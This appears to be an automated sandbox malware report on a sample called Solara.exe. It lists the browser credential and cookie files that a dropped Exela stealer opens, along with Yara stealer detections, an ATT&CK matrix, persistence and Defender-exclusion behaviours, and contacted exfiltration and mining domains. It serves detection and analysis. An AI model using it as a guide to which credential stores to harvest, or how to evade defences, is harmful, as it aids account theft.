                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                Yara detected Generic Python Stealer
                Source: Yara matchFile source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2093996201.0000019BB72E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2087167617.0000019BB60C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected Exela Stealer
                Source: Yara matchFile source: 0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2074477936.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2084894174.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2069028034.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Yara detected Python Stealer
                Source: Yara matchFile source: 0000004D.00000002.2083587274.0000019BB56B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000002.2086690451.0000019BB5FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Yara detected Generic Python Stealer
                Source: Yara matchFile source: 0000004D.00000003.2049850078.0000019BB5088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004D.00000003.2049788391.0000019BB635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		21
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                Data Encrypted for Impact
                CredentialsDomainsDefault Accounts2
                Native API                		11
                Windows Service                		11
                Windows Service                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory3
                File and Directory Discovery                		Remote Desktop Protocol2
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter                		221
                Registry Run Keys / Startup Folder                		111
                Process Injection                		21
                Obfuscated Files or Information                		Security Account Manager44
                System Information Discovery                		SMB/Windows Admin SharesData from Network Shared Drive4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                Service Execution                		Login Hook221
                Registry Run Keys / Startup Folder                		11
                Software Packing                		NTDS26
                Security Software Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets1
                Process Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials151
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                File Deletion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Masquerading                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589392 Sample: Solara.exe Startdate: 12/01/2025 Architecture: WINDOWS Score: 100 119 store1.gofile.io 2->119 121 pool.hashvault.pro 2->121 123 3 other IPs or domains 2->123 133 Malicious sample detected (through community Yara rule) 2->133 135 Antivirus detection for dropped file 2->135 137 Antivirus / Scanner detection for submitted sample 2->137 139 15 other signatures 2->139 10 Solara.exe 2 4 2->10         started        14 rdqanwpudvuj.exe 2->14         started        16 Solara.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 file5 103 C:\Users\user\AppData\Local\Temp\Solara.exe, PE32+ 10->103 dropped 105 C:\Users\user\AppData\Local\Tempxela.exe, PE32+ 10->105 dropped 107 C:\Users\user\AppData\...\Solara.exe.log, CSV 10->107 dropped 157 Creates multiple autostart registry keys 10->157 159 Bypasses PowerShell execution policy 10->159 161 Adds a directory exclusion to Windows Defender 10->161 20 Exela.exe 10->20         started        24 Solara.exe 1 2 10->24         started        26 powershell.exe 23 10->26         started        36 2 other processes 10->36 109 C:\Windows\Temp\ypynqohyxqjk.sys, PE32+ 14->109 dropped 163 Multi AV Scanner detection for dropped file 14->163 165 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->165 167 Modifies the context of a thread in another process (thread injection) 14->167 173 3 other signatures 14->173 28 powershell.exe 14->28         started        30 cmd.exe 14->30         started        32 powercfg.exe 14->32         started        38 10 other processes 14->38 169 Suspicious powershell command line found 16->169 34 powershell.exe 16->34         started        171 Changes security center settings (notifications, updates, antivirus, firewall) 18->171 signatures6 process7 dnsIp8 93 C:\Users\...\_quoting_c.cp310-win_amd64.pyd, PE32+ 20->93 dropped 95 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 20->95 dropped 97 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 20->97 dropped 101 30 other files (29 malicious) 20->101 dropped 141 Antivirus detection for dropped file 20->141 143 Multi AV Scanner detection for dropped file 20->143 145 Drops PE files to the startup folder 20->145 41 Exela.exe 20->41         started        99 C:\ProgramData\...\rdqanwpudvuj.exe, PE32+ 24->99 dropped 147 Uses powercfg.exe to modify the power settings 24->147 149 Adds a directory exclusion to Windows Defender 24->149 151 Modifies power options to not sleep / hibernate 24->151 52 15 other processes 24->52 153 Loading BitLocker PowerShell Module 26->153 46 conhost.exe 26->46         started        48 conhost.exe 28->48         started        54 3 other processes 30->54 56 2 other processes 32->56 58 2 other processes 34->58 50 conhost.exe 36->50         started        125 80.240.16.67, 443, 49857 AS-CHOOPAUS Germany 38->125 60 8 other processes 38->60 file9 signatures10 process11 dnsIp12 127 ip-api.com 208.95.112.1, 49982, 80 TUT-ASUS United States 41->127 129 api.gofile.io 51.91.7.6, 443, 49990 OVHFR France 41->129 131 4 other IPs or domains 41->131 111 C:\Users\user\AppData\Local\...xela.exe, PE32+ 41->111 dropped 113 C:\ProgramData\Microsoft\...xela.exe, PE32+ 41->113 dropped 115 C:\Users\user\AppData\...\LIJDSFKJZG.xlsx, ASCII 41->115 dropped 117 2 other malicious files 41->117 dropped 175 Tries to harvest and steal browser information (history, passwords, etc) 41->175 177 Detected generic credential text file 41->177 179 Modifies existing user documents (likely ransomware behavior) 41->179 62 Conhost.exe 41->62         started        64 Conhost.exe 41->64         started        181 Loading BitLocker PowerShell Module 52->181 66 conhost.exe 52->66         started        68 conhost.exe 52->68         started        79 15 other processes 52->79 183 Adds a directory exclusion to Windows Defender 58->183 70 powershell.exe 58->70         started        73 cmd.exe 58->73         started        75 sc.exe 58->75         started        77 Conhost.exe 58->77         started        file13 signatures14 process15 signatures16 81 Conhost.exe 62->81         started        83 Conhost.exe 64->83         started        155 Loading BitLocker PowerShell Module 70->155 85 conhost.exe 70->85         started        87 conhost.exe 73->87         started        89 wusa.exe 73->89         started        91 conhost.exe 75->91         started        process17

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Solara.exe71%ReversingLabsByteCode-MSIL.Trojan.Cassiopeia
                Solara.exe100%AviraTR/Dropper.Gen
                Solara.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe100%AviraHEUR/AGEN.1306040
                C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe100%AviraHEUR/AGEN.1306040
                C:\Users\user\AppData\Local\Temp\Exela.exe100%AviraHEUR/AGEN.1306040
                C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe47%ReversingLabsWin64.Trojan.Cerbu
                C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe83%ReversingLabsWin64.Trojan.Generic
                C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe47%ReversingLabsWin64.Trojan.Cerbu
                C:\Users\user\AppData\Local\Temp\Exela.exe47%ReversingLabsWin64.Trojan.Cerbu
                C:\Users\user\AppData\Local\Temp\Solara.exe83%ReversingLabsWin64.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\_MEI70882\VCRUNTIME140.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_decimal.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_multiprocessing.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_queue.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\libcrypto-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\libffi-7.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\libssl-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\python3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\select.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\sqlite3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pyd0%ReversingLabs
                C:\Windows\Temp\ypynqohyxqjk.sys5%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                		13.107.246.45
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    discordapp.com
                    		162.159.134.233
                    		truefalse
                      		high
                      pool.hashvault.pro
                      		192.248.189.11
                      		truefalse
                        		high
                        store1.gofile.io
                        		45.112.123.227
                        		truefalse
                          		high
                          api.gofile.io
                          		51.91.7.6
